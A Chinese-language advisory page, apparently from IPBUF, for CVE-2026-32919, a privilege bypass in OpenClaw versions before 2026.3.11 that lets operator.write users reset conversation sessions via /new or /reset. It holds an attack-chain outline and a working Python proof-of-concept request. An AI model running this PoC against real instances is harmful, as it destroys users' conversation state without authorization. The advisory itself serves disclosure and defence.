IPBUF安全漏洞报告
English
CVE-2026-32919 CVSS 6.1 中危

CVE-2026-32919 OpenClaw 权限绕过漏洞导致会话重置

披露日期: 2026-03-29

漏洞信息

漏洞编号
CVE-2026-32919
漏洞类型
权限绕过
CVSS评分
6.1 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

权限绕过OpenClaw会话重置CVE-2026-32919访问控制

漏洞概述

OpenClaw在2026.3.11之前的版本中存在严重的授权绕过漏洞。由于系统在处理特定代理请求时的权限校验逻辑存在缺陷,仅拥有operator.write权限的攻击者即可通过精心构造包含/new或/reset斜杠命令的请求,非法访问原本仅限operator.admin权限用户使用的会话重置逻辑。成功利用该漏洞可导致目标对话状态被恶意重置,严重影响系统的完整性与可用性。

技术细节

该漏洞的根本原因在于OpenClaw对特定API端点的访问控制实现不严谨。在受影响版本中,系统设计上要求只有具备operator.admin权限的用户才能执行会话重置操作(即通过/new或/reset斜杠命令触发)。然而,在处理代理请求的代码逻辑中,开发人员错误地仅校验了调用者是否具备operator.write权限,而未进一步验证其是否拥有执行敏感管理操作的高级权限。这构成了典型的权限越界漏洞。攻击者一旦获取了基础的写入权限,便可利用这一逻辑漏洞,构造恶意的JSON数据包发送至服务器。服务器在解析到斜杠命令后,由于缺乏二次权限校验,会直接执行会话重置逻辑,导致目标用户的当前对话上下文丢失,造成拒绝服务或状态篡改的后果。

攻击链分析

STEP 1
步骤1:权限获取
攻击者通过某种方式获取了OpenClaw系统的operator.write权限凭证。
STEP 2
步骤2:构造恶意请求
攻击者利用获取的凭证,向代理API接口发送包含/new或/reset斜杠命令的特制请求。
STEP 3
步骤3:权限绕过与执行
系统仅校验了写入权限,未拦截请求,直接执行了管理员级别的会话重置逻辑。
STEP 4
步骤4:达成攻击效果
目标用户的对话状态被强制重置,导致数据丢失或服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# PoC for CVE-2026-32919: OpenClaw Authorization Bypass # This script demonstrates how an operator.write user can reset a session. import requests TARGET_URL = "http://target-openclaw-instance/api/agent" # Assuming the attacker has a valid token for operator.write AUTH_TOKEN = "Bearer <operator_write_token>" SESSION_ID = "target_session_id" headers = { "Authorization": AUTH_TOKEN, "Content-Type": "application/json" } # Payload containing the slash command to reset the conversation payload = { "message": "/reset", "session_id": SESSION_ID, "context": {} } try: response = requests.post(TARGET_URL, json=payload, headers=headers) if response.status_code == 200: print("[+] Successfully reset the target session without admin privileges.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

OpenClaw < 2026.3.11

防御指南

临时缓解措施
建议管理员立即升级至OpenClaw 2026.3.11或更高版本以修复此漏洞。在无法立即升级的情况下,应严格限制operator.write权限的授予范围,并监控包含/new或/reset指令的异常代理请求流量。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表